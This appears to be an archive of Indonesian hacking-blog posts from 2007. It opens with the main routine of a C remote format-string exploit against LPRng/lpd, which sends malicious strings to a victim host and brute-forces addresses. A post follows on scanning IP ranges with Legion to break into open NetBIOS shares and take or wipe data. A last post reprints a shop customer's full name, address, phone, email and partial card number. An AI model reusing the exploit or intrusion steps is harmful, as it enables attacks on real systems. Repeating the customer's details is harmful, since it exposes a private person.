while(( c = getopt (argc, argv, “t:r:c:a:o:p:w:k”))!= EOF){

switch (c)
{

case ‘t’:
type = atoi(optarg);
break;

case ‘r’:
targets[type].eip_address = strtoul(optarg, NULL, 16);
break;

case ‘c’:
targets[type].shellcode_address = strtoul(optarg, NULL, 16);
break;

case ‘a’:
targets[type].align = atoi(optarg);
break;

case ‘o’:
offset = atoi(optarg);
break;

case ‘p’:
targets[type].position = atoi(optarg);
break;

case ‘w’:
targets[type].written_bytes = atoi(optarg);
break;

default:
usage(argv[0]);
return 1;
}
}

if(type < 0)
{
printf(“You must specify a type!\n”);
printf(“example: ./SEClpd victim -t 0\n”);
return -1;
}

if ( (he = gethostbyname (hostname)) == NULL)
{
herror(“gethostbyname”);
exit(1);
}

targets[type].shellcode_address = targets[type].eip_address + SHELLCODE_COUNT;

printf(“+++ http://www.netcat.it remote exploit for LPRng/lpd \n\n”);

printf(“+++ Exploit information\n”);
printf(“+++ Victim: %s\n”, hostname);
printf(“+++ Type: %d – %s\n”, type, targets[type].os_name);
printf(“+++ Eip address: 0x%x\n”, targets[type].eip_address);
printf(“+++ Shellcode address: 0x%x\n”, targets[type].shellcode_address);
printf(“+++ Position: %d\n”, targets[type].position);
printf(“+++ Alignment: %d\n”, targets[type].align);
printf(“+++ Offset %d\n”, offset);
printf(“\n”);

printf(“+++ Attacking %s with our format string\n”, hostname);

if( brute > 0 )
{

printf(“+++ Brute force man, relax and enjoy the ride ;>\n”);
targets[type].eip_address = 0xbffffff0;

while(failure)

{
memset(exploit_buffer, ”, sizeof(exploit_buffer));

format = create_malicious_string();
strcpy(exploit_buffer, address_buffer);
strcat(exploit_buffer, format);
strcat(exploit_buffer, “\n”);
send_code(exploit_buffer);

targets[type].eip_address = 0xbffffff0 – offset;

offset+=4;

if (offset > OFFSET_LIMIT) {
printf(“+++ Offset limit hit, ending brute mode ;<\n”);
return -1;

}
}
}

else

format = create_malicious_string();
strcpy(exploit_buffer, address_buffer);
strcat(exploit_buffer, format);
strcat(exploit_buffer, “\n”);
send_code(exploit_buffer);

printf(“Argh exploit failed$#%! try brute force!\n”);

return (-1);
}

[- Ruthness – S’to -]

Source: JASAKOM Information Center

Posted in Hacking | Leave a Comment »

Kantor Anda Bisa Di Hack

Posted by intrik on July 14, 2007

Suatu pagi anda  sedang asyik-asyiknya bekerja dan kemudian anda melakukan koneksi ke internet. Wahh, liat berita dulu deh pikir anda, maka koneksipun dilakukan, eh bos belon datang bisa chatting bentar deh ama kirim-kirim sms, toh semua dokumen sudah selesai dikerjakan.Begitu anda selesai melakukan koneksi dan anda lihat kedalam komputer anda untuk mereview sekali lagi dokumen yang telah di buat ternyata telah hilang semua. Tragis memang….
Mari kita lihat cerita diatas yang mungkin tidak akan anda sadari, seperti anda tidak melakukan download apapun dan komputer anda dilundungi oleh personal firewall dan juga anti virus 10 macam yang terbaru tetapi data anda bisa hilang. Ada apa gerangan ? apakah anda pikir hal tersebut tidak mungkin ?    Hal ini sebenarnya dengan gampang terjadi jika anda melakukan sharing di komputer anda dan melakukan koneksi ke internet. Begitu ada orang iseng yang mengecek semua IP, akan bisa melihat sharing anda (melalui netbios) dan bisa melakukan koneksi kedalam komputer anda. Tentu saja bukan tidak mungkin bagi orang untuk menghapus data-data anda. Terdapat juga program yang dengan mudah bisa digunakan oleh semua orang yang memungkinkan kita mengecek range IP sehingga semua komputer dengan range tersebut bisa di cek otomatis. Celakannya waktu penulis melakukan pengecekan hampir 5% dari range semua bisa dimasuki. Data-data perusahaan seperti piutang, surat-surat penting, dll semua bisa penulis dapatkan. Banyak perusahaan besar seperti yang terdapat di sudirman, dll bisa diambil bahkan diacak-acak sesuka hati. Program yang dimaksud adalah Legion yang dikeluarkan oleh group security/hacker “Rhin09” yang pernah membuat tutorial hacking NT.

.

    Setelah anda selesai melakukan pengecekan dengan Legion, langkah selanjutnya anda tinggal menggunakan map drive atau dengan klik drive yang di maksud, maka tamatlah sudah target anda yang ceroboh…

 

Note : Sangat diharapkan untuk tidak menggunakan pengetahuan yang diperoleh untuk hal-hal yang merugikan orang lain. Pendapat dan kritik bisa anda masukkan dalam forum dan mailing list.

 

By : [- S’to -]

 

Source: JASAKOM Information Center

Posted in Hacking | Leave a Comment »

Pembobolan 1000 Kredit Card di Step-up

Posted by intrik on July 14, 2007

Web site yang menawarkan pembelian barang-barang cukup banyak bertebaran di internet.  Pembelian di internetpun menawarkan banyak jasa dengan berbagai kemudahannya seperti dengan credit card, transfer, dll. Saat Amazon pertama didirikan, mereka menggunakan email dan setelah itu baru lah berkembang seperti sekarang ini.
Pertanyaan yang selalu muncul adalah bagaimana security nya ? mari kita melihat contoh kasus pada Stepup yg menggunakan cara konvensional melalui form isian yang tidak melalui SSL maupun  yang sejenisnya. Step up meminta anda untuk mengisi form yang kemudian disimpan pada file text. Disini kemudian muncul sedikit masalah, ketika konsep pembelian yang dilakukan bisa di baca.
Jasakom mencoba melihat ke dalam setting web site step-up dan menemukan bahwa file2 didalam web site tersebut bisa diambil seperti detail transaksi. Contoh dari detail transaksi adalah :

———————————————————————————–
Date 03/10/2000
Time 11:37
**Step Up Systems Order Confirmation **
Order No: 001840

Billing Information (* required)
First Name * : Eric
Last Name * : Shugg
Company :
Address * : 8 Burley Griffin Place
Address 2 : Eaglemont
City * : Melbourne
State/Province : Vic
Zip : 3084
Country * : Australia
Phone Work * : 03 94595742
Phone Home * : 03 94595742
E-mail * : epshugg@melbpc.org.au
Comment :
Position :
How did you find us? : Through Melbourne PC Group
What word did you search on? :
Mr/Mrs/Ms/Dr * : Mr

Shipping Information
First Name : Eric
Last Name : Shugg
Company :
Address : 8 Burley Griffin Place
Address 2 : Eaglemont
City : Melbourne
State/Province : Vic
Zip : 3084
Country : Australia
Phone Work : 03 94595***
Phone Home : 03 94595***
E-mail : epshugg@*******.org.au
Comment :
Payment Method : Mastercard
Credit Card # : 5353 **** 1531 ****  (Lengkapnya disamarkan-Red)
Exp. Date : **/**  (-Red)
Cardholder Name : Eric P Shugg
AMEX ID # :

Qty Part No Name Options Price Total
— ——- —————————— ——- ——- ——-
1 ISW5UD Info Select 5 Upgrade Download $109.00 $109.00

Sub Total : $109.00
Shipping Type : By Mail/Courier
Shipping : $10.00
Tax : $0.00
Total : $119.00
————————————————————————————–

Dari sini kita bisa melihat betapa berbahayanya ketika kita melakukan pembelian di internet. Begitu anda melakukan pembelian di internet, maka keamanan kartu kredit anda bahkan data dari anda diserahkan sepenuhnya kepada pihak web site. Apakah artinya “JANGAN” beli barang di internet ?? tentu saja bukan itu point nya. Karena kalau begitu maka web site dan segala kemudahan yang ditawarkannya tidak akan dan tidak bisa kita manfaatkan.
Ada beberapa teknik secure yang di terapkan di internet seperti konsep HTTPS yang menggunakan enkripsi tapi hal tersebut tetap tidak menjamin keamanan data karena hanya menjamin keamanan dari pengiriman data. Pada verifikasi kartu kredit, seperti yang dikembangkan oleh visa yang memungkinkan pihak pemilik web site tidak menyimpan data kartu kredit dan semua hal tersebut di lakukan oleh pihak visa, sehingga data anda akan aman. Cuman teknik yang dikembangkan oleh visa ini cenderung lebih sedikit ruwet karena membutuhkan anda melakukan tahapan tambahan sebelum melakukan transaksi. Jadi mana yang akan anda pilih ? yang jelas, hati2lah membeli dari website.

 

Berikut adalah cuplikan berita dari detik :

http://www.detik.com/net/2000/12/18/20001218-092240.shtml

Jasakom.com, Situs Network Security:
1000 Kartu Kredit Bisa Dibobol!
Reporter: Donny B.U.

detikcom – Jakarta, “Jangan beli barang di situs www.stepup.com.au. Kecuali apabila anda rela nomor kartu kredit anda dibajak oleh orang lain,” demikian hal tersebut disampaikan oleh seseorang yang menggunakan nickname S’to dari Jasakom.com kepada detikcom melalui e-mail pada Senin (18/12/2000).

Situs stepup.com.au dimiliki oleh perusahaan Step Up System, sebuah perusahaan penjualan software dan hardware secara online, yang berkedudukan di Richmond Victoria, Australia. Sedangkan Jasakom.com merupakan penyedia jasa online network security Indonesia dengan cara meng-audit network system security melalui internet dengan cara mendeteksi dan mengakses jaringan yang masih vulnerable dari sudut pandang hacker, dan kemudian melaporkannya kepada penyewa jasa tersebut.

“Pada situs yang memungkinkan kita membeli barang dengan kartu kredit tersebut, telah dilakukan setting yang sangat bodoh oleh admin server. Akibatnya siapapun dapat mengambil nomor kartu kredit beserta detil transaksi setiap orang yang membeli barang.” ujar S’to. S’to menjelaskan caranya dan ternyata sangatlah mudah.

Ketika dicoba, hanya dengan menggunakan browser dan mengetik alamat http://www.stepup.com.au//********/BOOTS-******.c32 (alamat lengkap disamarkan – Red.) maka detikcom bisa mendapatkan banyak sekali salinan lengkap data diri pemesan barang, jenis barang yang dipesan hingga nomor kartu kredit pemesan.

“Kelemahan pada situs tersebut memungkinkan kita untuk mengambil hampir 1000 nomor kartu kredit. Bahkan database security situs tersebut juga dimungkinkan untuk diambil,” ujar S’to. S’to juga menyarankan untuk tidak melakukan transaksi apapun di situs tersebut sebelum bug tersebut diperbaiki oleh admin server.

(dbu)

 


Source: JASAKOM Information Center

Posted in Hacking | Leave a Comment »